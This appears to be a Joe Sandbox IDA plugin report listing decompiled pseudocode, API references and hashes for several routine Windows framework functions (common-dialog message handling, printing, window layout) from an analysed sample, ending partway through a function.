0x00422084
0x00422086
0x00422089
0x00422095
0x0042209d
0x004220a1
0x004220b2
0x004220b7
0x004220c5
0x004220cb
0x004220cb
0x004220db
0x004220f4
0x004220f4
0x004220db
0x004220f9
0x004220fd
0x00000000

APIs

GetDlgCtrlID.USER32 ref: 0042208F
GetDlgItem.USER32 ref: 0042212C
ShowWindow.USER32(00000000,00000000), ref: 00422134
GetMenu.USER32(?), ref: 0042213D
InvalidateRect.USER32(?,00000000,00000001), ref: 00422150
SetMenu.USER32(?,00000000), ref: 0042215A
GetDlgItem.USER32 ref: 00422189
SetWindowLongA.USER32 ref: 004221A1
GetDlgItem.USER32 ref: 004221C0
GetDlgItem.USER32 ref: 004221D3
SetWindowLongA.USER32 ref: 004221E1
SetWindowLongA.USER32 ref: 004221EE
InvalidateRect.USER32(?,00000000,00000001), ref: 00422201
SetMenu.USER32(?,00000000), ref: 0042220D
GetDlgItem.USER32 ref: 0042223B
ShowWindow.USER32(?,00000005), ref: 00422247

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: ItemWindow$LongMenu$InvalidateRectShow$Ctrl
String ID:
API String ID: 461998371-0
Opcode ID: d02aa0295a976195957299b934b265eafdd74fa1612fec68cc443af8d633833d
Instruction ID: 11e971c61f50c2e3f40baeddfbca8ed65bc2cf00756bcc02c89e332112038adb
Opcode Fuzzy Hash: d02aa0295a976195957299b934b265eafdd74fa1612fec68cc443af8d633833d
Instruction Fuzzy Hash: D4617D30700311AFD7209F64EC88A2ABBF4FF48304F504A2EF656972A1CB75E855CB55

Uniqueness

Uniqueness Score: -1.00%

Function 004107DB, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 114
windowregistryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E004107DB(struct HWND__* _a4, intOrPtr _a8, short _a12, signed int _a16) {
				void* _t32;
				signed int _t34;
				void* _t40;
				int _t49;
				signed int _t58;
				intOrPtr _t63;
				void* _t64;
				intOrPtr* _t65;

				if(_a4 == 0) {
					L19:
					return 0;
				}
				_t64 = E00425C92(0x4397cc, E0042440D);
				_t54 =  *(_t64 + 0x18);
				if( *(_t64 + 0x18) != 0) {
					E00416433(_t54, _a4);
					 *(_t64 + 0x18) =  *(_t64 + 0x18) & 0x00000000;
				}
				_t63 = _a8;
				if(_t63 != 0x110) {
					__eflags = _t63 -  *0x439cb0; // 0x0
					if(__eflags == 0) {
						L22:
						SendMessageA(_a4, 0x111, 0xe146, 0);
						_t32 = 1;
						return _t32;
					}
					__eflags = _t63 - 0x111;
					if(_t63 != 0x111) {
						L8:
						__eflags = _t63 - 0xc000;
						if(_t63 < 0xc000) {
							goto L19;
						}
						_push(_a4);
						_t65 = E00413767();
						_t34 = E00416753(_t65, 0x42e898);
						__eflags = _t34;
						if(_t34 == 0) {
							L11:
							__eflags = _t63 -  *0x439cbc; // 0x0
							if(__eflags != 0) {
								__eflags = _t63 -  *0x439cb8; // 0x0
								if(__eflags != 0) {
									__eflags = _t63 -  *0x439cc0; // 0x0
									if(__eflags != 0) {
										__eflags = _t63 -  *0x439cb4; // 0x0
										if(__eflags != 0) {
											goto L19;
										}
										return  *((intOrPtr*)( *_t65 + 0xd0))();
									}
									_t58 = _a16 >> 0x10;
									__eflags = _t58;
									 *((intOrPtr*)( *_t65 + 0xd8))(_a12, _a16 & 0x0000ffff, _t58);
									goto L19;
								}
								__eflags =  *0x439c3c;
								if( *0x439c3c != 0) {
									 *(_t65 + 0x1f4) = _a16;
								}
								_t40 =  *((intOrPtr*)( *_t65 + 0xd4))();
								 *(_t65 + 0x1f4) =  *(_t65 + 0x1f4) & 0x00000000;
								return _t40;
							}
							return  *((intOrPtr*)( *_t65 + 0xd0))(_a16);
						}
						__eflags =  *(_t65 + 0x92) & 0x00000008;
						if(( *(_t65 + 0x92) & 0x00000008) != 0) {
							goto L19;
						}
						goto L11;
					}
					__eflags = _a12 - 0x40e;
					if(_a12 == 0x40e) {
						goto L22;
					}
					goto L8;
				} else {
					 *0x439cc0 = RegisterWindowMessageA("commdlg_LBSelChangedNotify");
					 *0x439cbc = RegisterWindowMessageA("commdlg_ShareViolation");
					 *0x439cb8 = RegisterWindowMessageA("commdlg_FileNameOK");
					 *0x439cb4 = RegisterWindowMessageA("commdlg_ColorOK");
					 *0x439cb0 = RegisterWindowMessageA("commdlg_help");
					_t49 = RegisterWindowMessageA("commdlg_SetRGBColor");
					_push(_a16);
					 *0x439cac = _t49;
					_push(_a12);
					return E00411B77(_t54, _a4, 0x110);
				}
			}

0x004107e5
0x00410932
0x00000000
0x00410932
0x004107fa
0x004107fc
0x00410801
0x00410806
0x0041080b
0x0041080b
0x0041080f
0x00410819
0x0041087d
0x00410888
0x0041094a
0x00410955
0x0041095d
0x00000000
0x0041095d
0x0041088e
0x00410890
0x0041089e
0x0041089e
0x004108a4
0x00000000
0x00000000
0x004108aa
0x004108b2
0x004108bb
0x004108c0
0x004108c2
0x004108cd
0x004108cd
0x004108d3
0x004108e4
0x004108ea
0x00410911
0x00410917
0x00410936
0x0041093c
0x00000000
0x00000000
0x00000000
0x00410942
0x0041091e
0x0041091e
0x0041092c
0x00000000
0x0041092c
0x004108ec
0x004108f3
0x004108f8
0x004108f8
0x00410902
0x00410908
0x00000000
0x00410908
0x00000000
0x004108dc
0x004108c4
0x004108cb
0x00000000
0x00000000
0x00000000
0x004108cb
0x00410892
0x00410898
0x00000000
0x00000000
0x00000000
0x0041081b
0x0041082d
0x00410839
0x00410845
0x00410851
0x0041085d
0x00410862
0x00410864
0x00410867
0x0041086c
0x00000000
0x00410873

APIs

Part of subcall function 00425C92: TlsGetValue.KERNEL32(004399AC,?,00000000,00424C0A,0042440D,00424C26,00412700,0041843C,?,00000000,?,0040ECAE,00000000,00000000,00000000,00000000), ref: 00425CD1

RegisterWindowMessageA.USER32(commdlg_LBSelChangedNotify,Function_0002440D), ref: 00410826
RegisterWindowMessageA.USER32(commdlg_ShareViolation), ref: 00410832
RegisterWindowMessageA.USER32(commdlg_FileNameOK), ref: 0041083E
RegisterWindowMessageA.USER32(commdlg_ColorOK), ref: 0041084A
RegisterWindowMessageA.USER32(commdlg_help), ref: 00410856
RegisterWindowMessageA.USER32(commdlg_SetRGBColor), ref: 00410862

Part of subcall function 00416433: SetWindowLongA.USER32 ref: 00416462

SendMessageA.USER32 ref: 00410955

Strings

commdlg_ShareViolation, xrefs: 00410828
commdlg_help, xrefs: 0041084C
commdlg_LBSelChangedNotify, xrefs: 00410821
commdlg_ColorOK, xrefs: 00410840
commdlg_SetRGBColor, xrefs: 00410858
commdlg_FileNameOK, xrefs: 00410834

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: MessageWindow$Register$LongSendValue
String ID: commdlg_ColorOK$commdlg_FileNameOK$commdlg_LBSelChangedNotify$commdlg_SetRGBColor$commdlg_ShareViolation$commdlg_help
API String ID: 2377901579-3888057576
Opcode ID: cf20618efcf828f21c6f481f5fb3a6feff5832e9dcd2cfa321dd56f44a1a627e
Instruction ID: 0c99fb2fb3094324f535d28c6dff1db6175635640ea54eadaac3d4f9a63322fb
Opcode Fuzzy Hash: cf20618efcf828f21c6f481f5fb3a6feff5832e9dcd2cfa321dd56f44a1a627e
Instruction Fuzzy Hash: B041AFB1704214ABDF24AF29DD54BAE3BA1EB00754F11542BF405972A2CBB99CC0CF9D

Uniqueness

Uniqueness Score: -1.00%

Function 00428103, Relevance: 21.5, APIs: 14, Instructions: 480
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00428103(intOrPtr* __ecx, void* __eflags) {
				void* __ebx;
				signed int _t227;
				void* _t228;
				CHAR* _t229;
				intOrPtr _t231;
				CHAR* _t232;
				signed int _t233;
				CHAR* _t242;
				CHAR* _t243;
				CHAR* _t253;
				intOrPtr* _t256;
				intOrPtr _t265;
				signed char _t266;
				intOrPtr _t268;
				int _t290;
				int _t296;
				signed int _t300;
				int _t310;
				void* _t323;
				void* _t335;
				void* _t337;
				intOrPtr _t353;
				struct HDC__* _t355;
				intOrPtr _t357;
				signed char _t383;
				void* _t396;
				signed int _t449;
				intOrPtr* _t452;
				intOrPtr* _t455;
				struct _DOCINFOA _t458;
				void* _t460;
				signed char _t461;
				void* _t463;
				void* _t465;
				void* _t466;
				void* _t468;

				E00406520(E0042A280, _t463);
				_t466 = _t465 - 0x32c;
				_t452 = __ecx;
				 *((intOrPtr*)(_t463 - 0x24)) = __ecx;
				E00428824(_t463 - 0x80);
				 *(_t463 - 4) = 0;
				if( *((short*)(E00413672() + 8)) != 0xe108) {
					L6:
					_t227 =  *((intOrPtr*)( *_t452 + 0xf4))(_t463 - 0x80);
					__eflags = _t227;
					if(_t227 != 0) {
						_t229 =  *0x436980; // 0x436994
						 *(_t463 - 0x3c) = _t229;
						 *(_t463 - 4) = 1;
						_t231 =  *((intOrPtr*)( *((intOrPtr*)(_t463 - 0x80)) + 0x5c));
						__eflags =  *(_t231 + 0x14) & 0x00000020;
						if(( *(_t231 + 0x14) & 0x00000020) == 0) {
							L12:
							_t232 =  *0x436980; // 0x436994
							 *(_t463 - 0x14) = _t232;
							_t233 =  *(_t452 + 0x3c);
							 *(_t463 - 4) = 0xa;
							__eflags = _t233;
							if(_t233 == 0) {
								E004140EE(E00414C6C(_t452), _t463 - 0x14);
							} else {
								E00416B95(_t463 - 0x14, _t463, _t233 + 0x1c);
							}
							__eflags =  *((intOrPtr*)( *(_t463 - 0x14) - 8)) - 0x1f;
							if(__eflags > 0) {
								E00416D10(_t463 - 0x14, __eflags, 0x1f);
							}
							_t458 = 0x14;
							E00406330(_t463 - 0x94, 0, _t458);
							_t468 = _t466 + 0xc;
							 *(_t463 - 0x90) =  *(_t463 - 0x14);
							_t242 =  *0x436980; // 0x436994
							 *(_t463 - 0x94) = _t458;
							 *(_t463 - 0x38) = _t242;
							_t243 =  *(_t463 - 0x3c);
							 *(_t463 - 4) = 0xb;
							__eflags =  *(_t243 - 8);
							if( *(_t243 - 8) != 0) {
								 *(_t463 - 0x8c) = _t243;
								E00417CBF(_t243, E00416CC1(_t463 - 0x38, _t463, 0x104), 0x104);
								_t460 = 0xf049;
							} else {
								 *(_t463 - 0x8c) = 0;
								_t323 = E004102D0( *((intOrPtr*)(_t463 - 0x80)), _t463 - 0x18);
								 *(_t463 - 4) = 0xc;
								E00416B95(_t463 - 0x38, _t463, _t323);
								 *(_t463 - 4) = 0xb;
								E00416AEC(_t463 - 0x18);
								_t460 = 0xf040;
							}
							E00419B00(_t463 - 0x34);
							__eflags =  *(_t463 - 0x7c);
							 *(_t463 - 4) = 0xd;
							if( *(_t463 - 0x7c) == 0) {
								E00419BB7(_t463 - 0x34,  *( *((intOrPtr*)( *((intOrPtr*)(_t463 - 0x80)) + 0x5c)) + 0x10));
								 *(_t463 - 0x28) = 1;
							}
							 *((intOrPtr*)( *_t452 + 0xf8))(_t463 - 0x34, _t463 - 0x80);
							__eflags =  *(_t463 - 0x7c);
							if( *(_t463 - 0x7c) == 0) {
								SetAbortProc( *(_t463 - 0x30), E00427F7F);
							}
							E004166CE(E00404DAE(), 0);
							_push(_t452);
							E00428772(_t463 - 0xf0, __eflags);
							_t253 =  *0x436980; // 0x436994
							 *(_t463 - 0x20) = _t253;
							 *(_t463 - 4) = 0xf;
							E004164C6(_t463 - 0xf0, 0xc9,  *(_t463 - 0x14));
							_t256 = E00410292( *((intOrPtr*)(_t463 - 0x80)), _t463 - 0x18);
							 *(_t463 - 4) = 0x10;
							E004164C6(_t463 - 0xf0, 0xca,  *_t256);
							 *(_t463 - 4) = 0xf;
							E00416AEC(_t463 - 0x18);
							E0041E3FA(_t463 - 0x20, _t460,  *(_t463 - 0x38));
							E004164C6(_t463 - 0xf0, 0xcb,  *(_t463 - 0x20));
							E0041668C(_t463 - 0xf0, 5);
							UpdateWindow( *(_t463 - 0xd4));
							__eflags =  *(_t463 - 0x7c);
							if( *(_t463 - 0x7c) != 0) {
								L27:
								_t265 =  *((intOrPtr*)( *((intOrPtr*)(_t463 - 0x80)) + 0x5c));
								_t449 =  *(_t265 + 0x1a) & 0x0000ffff;
								_t383 =  *(_t265 + 0x1c) & 0x0000ffff;
								_t461 =  *(_t265 + 0x18) & 0x0000ffff;
								__eflags = _t449 - _t383;
								 *(_t463 - 0x10) = _t449;
								if(_t449 < _t383) {
									 *(_t463 - 0x10) = _t383;
								}
								_t266 =  *(_t265 + 0x1e) & 0x0000ffff;
								__eflags =  *(_t463 - 0x10) - _t266;
								if( *(_t463 - 0x10) > _t266) {
									 *(_t463 - 0x10) = _t266;
								}
								__eflags = _t461 - _t383;
								if(_t461 < _t383) {
									_t461 = _t383;
								}
								__eflags = _t461 - _t266;
								if(_t461 > _t266) {
									_t461 = _t266;
								}
								__eflags =  *(_t463 - 0x10) - _t461;
								asm("sbb eax, eax");
								_t268 = (_t266 & 0x000000fe) + 1;
								__eflags =  *(_t463 - 0x10) - 0xffff;
								 *((intOrPtr*)(_t463 - 0x18)) = _t268;
								if(__eflags != 0) {
									_t151 = _t463 - 0x10;
									 *_t151 =  *(_t463 - 0x10) + _t268;
									__eflags =  *_t151;
								} else {
									 *(_t463 - 0x10) = 0xffff;
								}
								E00417214(_t463 - 0x20, __eflags, 0xf043);
								__eflags =  *(_t463 - 0x7c);
								 *(_t463 - 0x1c) = 0;
								if( *(_t463 - 0x7c) == 0) {
									__eflags = _t461 -  *(_t463 - 0x10);
									 *(_t463 - 0x6c) = _t461;
									if(_t461 ==  *(_t463 - 0x10)) {
										goto L53;
									} else {
										while(1) {
											 *((intOrPtr*)( *_t452 + 0xdc))(_t463 - 0x34, _t463 - 0x80);
											__eflags =  *(_t463 - 0x70);
											if( *(_t463 - 0x70) == 0) {
												goto L51;
											}
											wsprintfA(_t463 - 0x140,  *(_t463 - 0x20),  *(_t463 - 0x6c));
											_t468 = _t468 + 0xc;
											E004164C6(_t463 - 0xf0, 0xcc, _t463 - 0x140);
											_t290 = GetDeviceCaps( *(_t463 - 0x2c), 0xa);
											SetRect(_t463 - 0x5c, 0, 0, GetDeviceCaps( *(_t463 - 0x2c), 8), _t290);
											DPtoLP( *(_t463 - 0x2c), _t463 - 0x5c, 2);
											_t296 = StartPage( *(_t463 - 0x30));
											__eflags = _t296;
											if(_t296 < 0) {
												L50:
												_t452 =  *((intOrPtr*)(_t463 - 0x24));
												 *(_t463 - 0x1c) = 1;
											} else {
												__eflags =  *0x439c48; // 0x1
												_t455 =  *((intOrPtr*)(_t463 - 0x24));
												if(__eflags != 0) {
													 *((intOrPtr*)( *_t455 + 0xdc))(_t463 - 0x34, _t463 - 0x80);
												}
												 *((intOrPtr*)( *_t455 + 0xfc))(_t463 - 0x34, _t463 - 0x80);
												__eflags = EndPage( *(_t463 - 0x30));
												if(__eflags < 0) {
													goto L50;
												} else {
													_t300 = E00427F7F(__eflags,  *(_t463 - 0x30), 0);
													__eflags = _t300;
													if(_t300 == 0) {
														goto L50;
													} else {
														_t452 =  *((intOrPtr*)(_t463 - 0x24));
														 *(_t463 - 0x6c) =  *(_t463 - 0x6c) +  *((intOrPtr*)(_t463 - 0x18));
														__eflags =  *(_t463 - 0x6c) -  *(_t463 - 0x10);
														if( *(_t463 - 0x6c) !=  *(_t463 - 0x10)) {
															continue;
														} else {
														}
													}
												}
											}
											goto L51;
										}
										goto L51;
									}
								} else {
									 *((intOrPtr*)( *_t452 + 0xdc))(_t463 - 0x34, _t463 - 0x80);
									 *((intOrPtr*)( *_t452 + 0xfc))(_t463 - 0x34, _t463 - 0x80);
									L51:
									__eflags =  *(_t463 - 0x7c);
									if( *(_t463 - 0x7c) == 0) {
										__eflags =  *(_t463 - 0x1c);
										if( *(_t463 - 0x1c) != 0) {
											AbortDoc( *(_t463 - 0x30));
										} else {
											L53:
											EndDoc( *(_t463 - 0x30));
										}
									}
								}
								E004166CE(E00404DAE(), 1);
								 *((intOrPtr*)( *_t452 + 0x100))(_t463 - 0x34, _t463 - 0x80);
								E00413F6F(_t463 - 0xf0);
								E00419BEE(_t463 - 0x34);
							} else {
								_t310 = StartDocA( *(_t463 - 0x30), _t463 - 0x94);
								__eflags = _t310 - 0xffffffff;
								if(_t310 != 0xffffffff) {
									goto L27;
								} else {
									E004166CE(E00404DAE(), 1);
									 *((intOrPtr*)( *_t452 + 0x100))(_t463 - 0x34, _t463 - 0x80);
									E00413F6F(_t463 - 0xf0);
									E00419BEE(_t463 - 0x34);
									_push(0xffffffff);
									_push(0);
									_push(0xf106);
									E0041BB7E(_t463 - 0x34, __eflags);
								}
							}
							 *(_t463 - 4) = 0xe;
							E00416AEC(_t463 - 0x20);
							 *(_t463 - 4) = 0xd;
							 *((intOrPtr*)(_t463 - 0xf0)) = 0x42cb34;
							E00411D13(_t463 - 0xf0);
							 *(_t463 - 4) = 0xb;
							E00419C1F(_t463 - 0x34);
							 *(_t463 - 4) = 0xa;
							E00416AEC(_t463 - 0x38);
							 *(_t463 - 4) = 1;
							_t396 = _t463 - 0x14;
						} else {
							__eflags =  *(_t463 - 0x7c);
							if( *(_t463 - 0x7c) != 0) {
								goto L12;
							} else {
								E00416B16(_t463 - 0x1c, _t463, 0xf045);
								 *(_t463 - 4) = 2;
								E00416B16(_t463 - 0x40, _t463, 0xf046);
								 *(_t463 - 4) = 3;
								E00416B16(_t463 - 0x44, _t463, 0xf047);
								 *(_t463 - 4) = 4;
								E00416B16(_t463 - 0x10, _t463, 0xf048);
								_push(0);
								_push( *((intOrPtr*)(_t463 - 0x44)));
								 *(_t463 - 4) = 5;
								_push(6);
								_push( *((intOrPtr*)(_t463 - 0x40)));
								_push( *(_t463 - 0x1c));
								_push(0);
								E00410385(_t463 - 0x338);
								 *(_t463 - 4) = 6;
								 *(_t463 - 0x2ac) =  *(_t463 - 0x10);
								_t335 = E004104E7(0);
								__eflags = _t335 - 1;
								if(_t335 == 1) {
									_push(_t463 - 0x18);
									_t337 = E004105C2(_t463 - 0x338);
									 *(_t463 - 4) = 8;
									E00416B95(_t463 - 0x3c, _t463, _t337);
									 *(_t463 - 4) = 6;
									E00416AEC(_t463 - 0x18);
									 *(_t463 - 4) = 9;
									E00416AEC(_t463 - 0x28c);
									 *(_t463 - 4) = 5;
									E00411D13(_t463 - 0x338);
									 *(_t463 - 4) = 4;
									E00416AEC(_t463 - 0x10);
									 *(_t463 - 4) = 3;
									E00416AEC(_t463 - 0x44);
									 *(_t463 - 4) = 2;
									E00416AEC(_t463 - 0x40);
									 *(_t463 - 4) = 1;
									E00416AEC(_t463 - 0x1c);
									goto L12;
								} else {
									 *(_t463 - 4) = 7;
									E00416AEC(_t463 - 0x28c);
									 *(_t463 - 4) = 5;
									E00411D13(_t463 - 0x338);
									 *(_t463 - 4) = 4;
									E00416AEC(_t463 - 0x10);
									 *(_t463 - 4) = 3;
									E00416AEC(_t463 - 0x44);
									 *(_t463 - 4) = 2;
									E00416AEC(_t463 - 0x40);
									 *(_t463 - 4) = 1;
									_t396 = _t463 - 0x1c;
								}
							}
						}
						E00416AEC(_t396);
						 *(_t463 - 4) = 0;
						E00416AEC(_t463 - 0x3c);
					}
				} else {
					_t353 =  *((intOrPtr*)( *((intOrPtr*)(E00424BFB() + 4)) + 0xac));
					if(_t353 == 0 ||  *((intOrPtr*)(_t353 + 0x10)) != 3) {
						L5:
						 *(_t463 - 0x74) = 1;
						goto L6;
					} else {
						_t355 = CreateDCA( *(_t353 + 0x1c),  *(_t353 + 0x18),  *(_t353 + 0x20), 0);
						_t448 =  *((intOrPtr*)( *((intOrPtr*)(_t463 - 0x80)) + 0x5c));
						 *( *((intOrPtr*)( *((intOrPtr*)(_t463 - 0x80)) + 0x5c)) + 0x10) = _t355;
						_t357 =  *((intOrPtr*)( *((intOrPtr*)(_t463 - 0x80)) + 0x5c));
						_t473 =  *((intOrPtr*)(_t357 + 0x10));
						if( *((intOrPtr*)(_t357 + 0x10)) != 0) {
							goto L5;
						} else {
							_push(0xffffffff);
							_push(0);
							_push(0xf106);
							E0041BB7E(_t448, _t473);
						}
					}
				}
				 *(_t463 - 4) =  *(_t463 - 4) | 0xffffffff;
				_t228 = E004288AC(_t463 - 0x80);
				 *[fs:0x0] =  *((intOrPtr*)(_t463 - 0xc));
				return _t228;
			}

0x00428108
0x0042810d
0x00428116
0x0042811b
0x0042811e
0x00428125
0x00428133
0x0042818d
0x00428195
0x0042819b
0x0042819d
0x004281a3
0x004281a8
0x004281ae
0x004281b2
0x004281b5
0x004281b9
0x00428305
0x00428305
0x0042830a
0x0042830d
0x00428310
0x00428314
0x00428316
0x00428333
0x00428318
0x0042831f
0x0042831f
0x0042833e
0x00428341
0x00428348
0x00428348
0x00428355
0x00428359
0x00428361
0x00428364
0x0042836a
0x0042836f
0x00428375
0x00428378
0x0042837b
0x0042837f
0x00428382
0x004283b6
0x004283cf
0x004283d4
0x00428384
0x0042838b
0x00428391
0x0042839a
0x0042839e
0x004283a6
0x004283aa
0x004283af
0x004283af
0x004283dc
0x004283e1
0x004283e4
0x004283e8
0x004283f6
0x004283fb
0x004283fb
0x0042840e
0x00428414
0x00428417
0x00428421
0x00428421
0x0042842f
0x00428434
0x0042843b
0x00428440
0x00428445
0x00428451
0x0042845a
0x00428466
0x00428473
0x0042847c
0x00428484
0x00428488
0x00428495
0x004284a8
0x004284b5
0x004284c0
0x004284c6
0x004284c9
0x00428525
0x00428528
0x0042852b
0x0042852f
0x00428533
0x00428537
0x00428539
0x0042853c
0x0042853e
0x0042853e
0x00428541
0x00428545
0x00428548
0x0042854a
0x0042854a
0x0042854d
0x0042854f
0x00428551
0x00428551
0x00428553
0x00428555
0x00428557
0x00428557
0x00428559
0x00428561
0x00428565
0x00428566
0x00428569
0x0042856c
0x00428573
0x00428573
0x00428573
0x0042856e
0x0042856e
0x0042856e
0x0042857e
0x00428583
0x00428586
0x00428589
0x004285b4
0x004285b7
0x004285ba
0x00000000
0x004285c0
0x004285c6
0x004285d2
0x004285d8
0x004285db
0x00000000
0x00000000
0x004285ee
0x004285f4
0x00428609
0x00428613
0x00428626
0x00428635
0x0042863e
0x00428644
0x00428646
0x004286a8
0x004286a8
0x004286ab
0x00428648
0x00428648
0x0042864e
0x00428651
0x0042865f
0x0042865f
0x00428671
0x00428680
0x00428682
0x00000000
0x00428684
0x00428688
0x0042868d
0x0042868f
0x00000000
0x00428691
0x00428694
0x00428697
0x0042869d
0x004286a0
0x00000000
0x00000000
0x004286a6
0x004286a0
0x0042868f
0x00428682
0x00000000
0x00428646
0x00000000
0x004285c6
0x0042858b
0x00428597
0x004285a9
0x004286b2
0x004286b2
0x004286b5
0x004286b7
0x004286ba
0x004286ca
0x004286bc
0x004286bc
0x004286bf
0x004286bf
0x004286ba
0x004286b5
0x004286d9
0x004286ea
0x004286f6
0x004286fe
0x004284cb
0x004284d5
0x004284db
0x004284de
0x00000000
0x004284e0
0x004284e9
0x004284fa
0x00428506
0x0042850e
0x00428513
0x00428515
0x00428516
0x0042851b
0x0042851b
0x004284de
0x00428706
0x0042870a
0x00428715
0x00428719
0x00428723
0x0042872b
0x0042872f
0x00428737
0x0042873b
0x00428740
0x00428744
0x004281bf
0x004281bf
0x004281c2
0x00000000
0x004281c8
0x004281d0
0x004281dd
0x004281e1
0x004281ee
0x004281f2
0x004281ff
0x00428203
0x00428208
0x0042820f
0x00428212
0x00428216
0x00428218
0x0042821b
0x0042821e
0x0042821f
0x0042822d
0x00428231
0x00428237
0x0042823c
0x0042823f
0x00428298
0x00428299
0x004282a2
0x004282a6
0x004282ae
0x004282b2
0x004282bd
0x004282c1
0x004282cc
0x004282d0
0x004282d8
0x004282dc
0x004282e4
0x004282e8
0x004282f0
0x004282f4
0x004282fc
0x00428300
0x00000000
0x00428241
0x00428247
0x0042824b
0x00428256
0x0042825a
0x00428262
0x00428266
0x0042826e
0x00428272
0x0042827a
0x0042827e
0x00428283
0x00428287
0x00428287
0x0042823f
0x004281c2
0x00428747
0x0042874f
0x00428752
0x00428752
0x00428135
0x0042813d
0x00428145
0x00428186
0x00428186
0x00000000
0x0042814d
0x0042815a
0x00428163
0x00428166
0x0042816c
0x0042816f
0x00428172
0x00000000
0x00428174
0x00428174
0x00428176
0x00428177
0x0042817c
0x0042817c
0x00428172
0x00428145
0x00428757
0x0042875e
0x00428769
0x00428771

APIs

__EH_prolog.LIBCMT ref: 00428108

Part of subcall function 00428824: __EH_prolog.LIBCMT ref: 00428829

Part of subcall function 00413672: GetMessageTime.USER32(Function_0002440D), ref: 00413684
Part of subcall function 00413672: GetMessagePos.USER32 ref: 0041368D

CreateDCA.GDI32(?,?,?,00000000), ref: 0042815A
SetAbortProc.GDI32(?,Function_00027F7F), ref: 00428421
UpdateWindow.USER32(?), ref: 004284C0
StartDocA.GDI32(?,?), ref: 004284D5
EndDoc.GDI32(?), ref: 004286BF

Part of subcall function 0041BB7E: __EH_prolog.LIBCMT ref: 0041BB83

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: H_prolog$Message$AbortCreateProcStartTimeUpdateWindow
String ID:
API String ID: 900908304-0
Opcode ID: a9a56cf884ea0ddfdff13adf36a7dc5d90a4e26b108d0df44a24b90832e2b856
Instruction ID: b1286eb136246b1ee29ef1a1e14188ff5951a4f8bc16bfaf6e35fdac19ebc766
Opcode Fuzzy Hash: a9a56cf884ea0ddfdff13adf36a7dc5d90a4e26b108d0df44a24b90832e2b856
Instruction Fuzzy Hash: 1C127070E01219EFCF14EBA4D885AEDBBB4BF14308F5040AEE515B3292DB789A44DF65

Uniqueness

Uniqueness Score: -1.00%

Function 0041D717, Relevance: 21.4, APIs: 14, Instructions: 390
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0041D717(void* __ebx, intOrPtr __ecx, void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				struct tagRECT _v32;
				int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				long _v56;
				signed int _v60;
				void* _v64;
				intOrPtr _v68;
				intOrPtr* _v72;
				struct tagRECT _v88;
				struct tagRECT _v104;
				int _v136;
				char _v144;
				intOrPtr* _t191;
				intOrPtr _t197;
				signed int _t199;
				intOrPtr* _t205;
				intOrPtr _t213;
				signed int _t215;
				long _t218;
				signed int _t219;
				signed int _t225;
				void* _t229;
				intOrPtr* _t231;
				intOrPtr _t238;
				intOrPtr _t239;
				int _t244;
				signed int _t245;
				signed int _t249;
				signed int _t251;
				signed int _t256;
				long _t263;
				intOrPtr _t264;
				int _t269;
				signed int _t273;
				signed int _t277;
				long _t285;
				void* _t293;
				signed int _t294;
				signed int _t295;
				signed int _t299;
				intOrPtr _t305;
				long _t312;
				int _t322;
				long _t327;
				signed int _t333;
				intOrPtr _t336;
				RECT* _t341;
				signed int _t342;
				intOrPtr* _t343;
				int _t345;

				_t293 = __ebx;
				_t336 = __ecx;
				_v68 = __ecx;
				_t191 = E0041E6BA( &_v64, _a8, _a12);
				_t341 = _t336 + 0x94;
				_v12 =  *_t191;
				_v8 =  *((intOrPtr*)(_t191 + 4));
				if(IsRectEmpty(_t341) != 0) {
					GetClientRect( *(E00414C6C(_t336) + 0x1c),  &_v88);
					_t197 = _v88.right - _v88.left;
					_t305 = _v88.bottom - _v88.top;
				} else {
					_t197 = _t341->right - _t341->left;
					_t305 = _t341->bottom - _t341->top;
				}
				_t342 = 0;
				_v48 = _t197;
				_v44 = _t305;
				if( *((intOrPtr*)(_t336 + 0x90)) == 0) {
					_v136 = BeginDeferWindowPos( *(_t336 + 0x84));
				} else {
					_v136 = 0;
				}
				_t199 =  *0x439bf0; // 0x2
				_push(_t293);
				_t294 =  *0x439bf4; // 0x2
				_v40 = _t342;
				_t295 =  ~_t294;
				_v56 =  ~_t199;
				_v36 = _t342;
				_v16 = _t342;
				if( *(_t336 + 0x84) <= _t342) {
					L73:
					if( *((intOrPtr*)(_t336 + 0x90)) == _t342 && _v136 != _t342) {
						EndDeferWindowPos(_v136);
					}
					SetRectEmpty( &_v104);
